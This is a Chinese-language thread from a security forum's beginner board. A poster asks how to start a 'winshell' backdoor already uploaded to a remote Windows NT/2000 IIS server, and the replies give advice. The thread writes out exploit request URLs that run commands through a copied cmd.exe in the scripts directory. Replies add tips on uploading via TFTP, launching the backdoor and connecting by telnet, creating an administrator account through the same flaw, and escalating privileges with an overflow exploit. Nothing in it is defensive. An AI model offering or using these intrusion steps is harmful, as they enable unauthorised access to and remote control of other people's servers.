论坛: 菜鸟乐园 标题: 怎么利用漏洞启动winshell??? 复制本贴地址    
作者: an [an]    论坛用户   登录
远程NT机有漏洞可以用:
http://*.*.*.*/scripts/c.exe?/c+dir c:\命令看到C盘

如果已经传上一个剑客的winshell到c:\inetpub\scripts\下,用

http://*.*.*.*/scripts/c.exe?/c+c:\inetpub\scripts\winshell.exe

命令返回的信息是The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

不过还是不能连接上winshell...好象是没有成功打开winshell...
应该怎么办???请教教...谢谢...


[此贴被 an(an) 在 07月25日22时09分 编辑过]

地主 发表时间: 07/25 22:50

回复: xrb [xrb]   论坛用户   登录
你是如何上的 如果用TFTP对方有防火墙会显示数据lost 我上不上去大多是这样 不过有是会超时
你应先看对方目录有你的文件没  具我所知开防火墙没办法上传

B1层 发表时间: 07/26 10:21

回复: an [an]   论坛用户   登录
晕啊....有没看清楚的啊...我是说我已经上传了一个winshell了~

我的问题是:如何启动winshell啊.....

改正一点...对方是WIN2000server...不过也没什么分别...呵呵..

能再指点一下么??谢谢......

B2层 发表时间: 07/26 20:14

回复: all528 [all528]   论坛用户   登录
呵呵 你即使上传了winshell也没有管理远的权限
/scripts/c.exe?/c+winshell.exe
当进度条到一半的时候就telnet

B3层 发表时间: 07/28 13:09

回复: dk [dk]   论坛用户   登录
利用U漏洞创建 管理帐号  然后IpC多方便~

B4层 发表时间: 07/28 17:00

回复: all528 [all528]   论坛用户   登录
小白不知道就不要说以U漏洞本身可以建立管理元吗 权限根本就不够一定要用溢出程序提升权限的

B5层 发表时间: 07/29 10:29

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号